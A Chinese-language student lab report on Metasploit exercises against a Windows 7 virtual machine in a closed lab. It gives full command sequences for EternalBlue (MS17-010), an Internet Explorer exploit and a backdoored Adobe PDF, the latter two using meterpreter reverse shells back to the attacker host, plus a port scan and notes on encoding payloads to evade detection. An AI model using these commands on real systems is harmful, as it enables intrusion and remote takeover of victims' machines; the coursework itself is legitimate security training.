20211317李卓桐 Exp6 MSF攻防實踐 實驗報告

LLLZTTT發表於2024-05-09

Exp6 MSF攻防實踐

實踐內容

  • 本實踐目標是掌握metasploit的基本應用方式,重點常用的三種攻擊方式的思路。具體需要完成:

    1.1一個主動攻擊實踐,儘量使用最新的類似漏洞;

    1.2 一個針對瀏覽器的攻擊,儘量使用最新的類似漏洞;

    1.3 一個針對客戶端的攻擊,如Adobe或office,儘量使用最新的類似漏洞;

    1.4 成功應用任何一個輔助模組。

  • 問題回答:

    2.1.基礎問題回答

    (1)用自己的話解釋什麼是exploit,payload,encode.

    2.2.實踐總結與體會

    2.3.離實戰還缺些什麼技術或步驟?

    2.4.實踐過程記錄

實踐過程記錄

1.1一個主動攻擊實踐,儘量使用最新的類似漏洞;

  • 首先是下載win7虛擬機器,透過exploit-db.com的進行漏洞查詢和攻擊嘗試,結果顯示win10的漏洞較少,或難以攻破,故本次實驗我們以win7系統為例。
  • 下載Adobe Reader
  • 暴力直接一點,先關閉win7的防火牆,這步相當於是省略了之前的免殺實驗,將重心放在了漏洞利用上
  • 檢視win7 IP地址:192.168.121.132
  • 開啟kali,檢視靶機漏洞,輸入命令:nmap -sS -A -Pn --script smb-vuln-ms17-010 -P0 192.168.121.132
  • 翻譯成中文方便理解

啟動Nmap 7.94SVN(https://nmap.org)2024-05-09 09:03 CST
狀態:0:00:17已過;0臺主機已完成(1臺以上),1臺正在進行服務掃描
服務掃描時間:約9.09%已完成;ETC:9:04(還剩0:01:00)
狀態:0:00:59已過;0臺主機已完成(1臺以上),1臺正在進行服務掃描
服務掃描時間:約45.45%已完成;ETC:09:05(還剩0:00:59)
192.168.121.132的Nmap掃描報告
主機已啟動(0.00064s延遲)。
未顯示:989個關閉的tcp埠(重置)
埠狀態服務版本
135/tcp開放msrpc Microsoft Windows RPC
139/tcp開放式netbios ssn Microsoft Windows netbios ss
445/tcp open microsoft ds microsoft Windows 7-10 microsoft ds(工作組:workgroup)
3389/tcp-開啟-tcpwrapped
5357/tcp開放式http&&Microsoft HTTPAPI httpd 2.0(SSDP/UPnP)
.http伺服器頭:Microsoft HTTPAPI/2.0
49152/tcp開放msrpc Microsoft Windows RPC
49153/tcp開放msrpc Microsoft Windows RPC
49154/tcp開放msrpc Microsoft Windows RPC
49155/tcp開放msrpc Microsoft Windows RPC
49156/tcp開放msrpc Microsoft Windows RPC
49157/tcp開放msrpc Microsoft Windows RPC
MAC地址:00:0C:29:ED:9F:FF(VMware)
未檢測到支援顏色管理的裝置裝置型別:通用
執行:Microsoft Windows 7.2008.8.1
作業系統CPE:CPE:/o:microsoft.com/windows_7::-CPE:/o:microsoft.com/windows_7::sp1 CPE:/o:microsoft.com/windows_server/2008::sp1 CPE:/o:microsoft:windows_server2008:r2 CPE:/o:microsoft:windows_8 CPE:/o.microsoft.com/windows_8.1
作業系統詳細資訊:Microsoft Windows 7 SP0-SP1、Windows Server 2008 SP1、Windows伺服器2008 R2、Windows 8或Windows 8.1 Update 1
網路距離:1跳
服務資訊:主機:20211317LZT;作業系統:Windows;CPE:CPE:/o:microsoft:windows
主機指令碼結果:
|smb-vuln-ms17-010:
脆弱的:
Microsoft SMBv1伺服器中存在遠端程式碼執行漏洞(ms17-010)
狀態:脆弱。
ID:CVE:CVE-2017-0143
風險因素:高。
Microsoft SMBv1中存在一個關鍵的遠端程式碼執行漏洞。
.伺服器(ms17-010)。
是 啊
|披露日期:2017-03-14
|參考文獻:
是 啊https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
是 啊https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
我很抱歉。https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
追蹤路線
躍點RTT地址
1.64毫秒192.168.121.132
已執行作業系統和服務檢測。請在上報告任何不正確的結果https://nmap.org/submit/ .
Nmap完成:77.87秒內掃描1個IP地址(1個主機啟動)

可以看到有該ms17-010漏洞

  • 開啟msfconsole

  • 設定靶機IP地址,進行攻擊
use exploit/windows/smb/ms17_010_eternalblue  //呼叫滲透模組(也可直接use 0)
set rhost 192.168.121.132  //設定靶機IP地址
exploit

  • 獲得了目標主機的shell命令列,可以執行相關命令

1.2 一個針對瀏覽器的攻擊,儘量使用最新的類似漏洞;

use exploit/windows/browser/ms11_003_ie_css_import 
set payload windows/meterpreter/reverse_tcp
set srvhost 192.168.121.130 //監聽主機kali的IP地址
set lhost 192.168.121.130 //監聽主機kali的IP地址
set uripath 4308
exploit

  • 在win7中用IE瀏覽器進行訪問我們得到的url連結:http://192.168.121.130:8080/4308

  • Kali中有對應的反饋

  • 按回車輸入以下程式碼:
    sessions

  • 輸入shell進行測試,然後輸入sessions -i 1

1.3 一個針對客戶端的攻擊,如Adobe或office,儘量使用最新的類似漏洞

  • 進入msf,查詢adobe漏洞
    search adobe

  • 選擇第九條漏洞,依次輸入如下程式碼
use 9  //呼叫滲透模組
set payload windows/meterpreter/reverse_tcp //呼叫meterpreter載荷,反向連線到滲透機
set lhost 192.168.121.130 //設定Kali Linux的IP地址
set lport 4308 //設定本地監聽埠
set FILENAME 20211302.pdf //設定帶有後門程式的PDF檔案
set target 0
exploit

  • 檔案建立成功,利用遠端連結將檔案複製到win7中,在win7中使用adobe reader9.0開啟該pdf檔案

- Metasploit開啟shell監聽會話
use exploit/multi/handler //使用handler監聽模組
set payload windows/meterpreter/reverse_tcp //回彈一個tcp連線
set LHOST 192.168.121.130 //設定監聽IP地址(跟PDF木馬檔案一致)
set LPORT 4308 //設定監聽的埠(跟PDF木馬檔案一致)
exploit
  • kali主機即可獲取到目標的命令列

1.4 成功應用任何一個輔助模組

  • 選擇metasploit的auxiliary(輔助模組): 包含掃描、fuzz測試、漏洞挖掘、⽹絡協議欺騙等程式。

  • 使用PortScan進行埠掃描,命令如下:

use auxiliary/scanner/portscan/tcp
set rhosts 192.168.121.132
exploit
  • 結果如下,我們可以看到,metasploit幫助我們獲取了目標已經開放的埠,由此我們可以推測出靶機可能存在的漏洞和可能提供的服務,進而完成後續攻擊。

問題回答

用自己的話解釋什麼是exploit,payload,encode.

  • Exploit(漏洞利用):
    漏洞利用,可以想象我們手頭有一個能開啟別人家鎖的小工具。這個工具專門針對某個特定的鎖(軟體或系統中的漏洞)設計,能夠巧妙地利用這個漏洞,開啟通往系統內部的大門。在MSF框架中,exploit就是一個指令碼或模組,它利用目標系統中的安全漏洞,比如緩衝區溢位、未經授權的訪問路徑等,目的是在目標系統上獲得執行程式碼的能力。

  • Payload(有效載荷):
    如果說exploit是開門的工具,那麼payload就是進門後你要做的事情,可以理解成放置一枚定時炸彈。在MSF中,payload就是一旦漏洞利用成功後,你想要在目標系統上執行的實際程式碼片段。也就是獲取一個遠端控制的shell(命令列介面),以便進一步控制目標機器,或者是執行特定的惡意操作,比如資料竊取、檔案下載等。payload是實現攻擊目的的關鍵程式碼。

  • Encode(編碼):
    編碼就像是給我們的攻擊指令穿上了一層隱身衣。在網路傳輸過程中,直接傳送惡意payload可能會被防火牆或入侵防禦系統(IPS)識別並攔截。因此,透過編碼,可以對payload進行改造,讓它看起來像是無害的資料,從而繞過安全檢測。編碼技術包括但不限於新增多餘的字元、改變字元順序或使用特殊編碼方案,使得payload能夠在不被察覺的情況下到達目的地,並在那裡被正確解碼執行。在MSF中,你通常可以選用不同的編碼器來提高payload的隱蔽性和成功率。

學習心得體會

網路攻防還是很有意思的,雖然實驗比較繁瑣,也只是照貓畫虎循規蹈矩來做,但是在做實驗的時候確實有種駭客的感覺,這次MSF攻防更讓我有這種感覺,實驗中我也瞭解了windows系統的許多漏洞,為了讓攻擊能夠成功,我準備的環境是儘可能老一點的win7系統,實驗中我也發現msf確實很實用,幾次實驗下來有一半都要用到msf,可以說是攻擊神器了。

離實戰還缺些什麼技術或步驟?

其實實驗還是遠遠比不上實戰,感覺只是找了一種相對簡單的方式進行模擬,省略了很多流程,如社工攻擊、漏洞分析和研究、繞過技術,甚至是攻與防的比拼等環節,對於如何繞過防火牆、入侵檢測沒有深入研究,包括社工攻擊的方式如釣魚連結或者木馬程式也沒有模擬,同時我們是針對win7進行的實驗,也不是完全最新的漏洞,而實際上這些漏洞在最新的系統中可能已經更新修補。

相關文章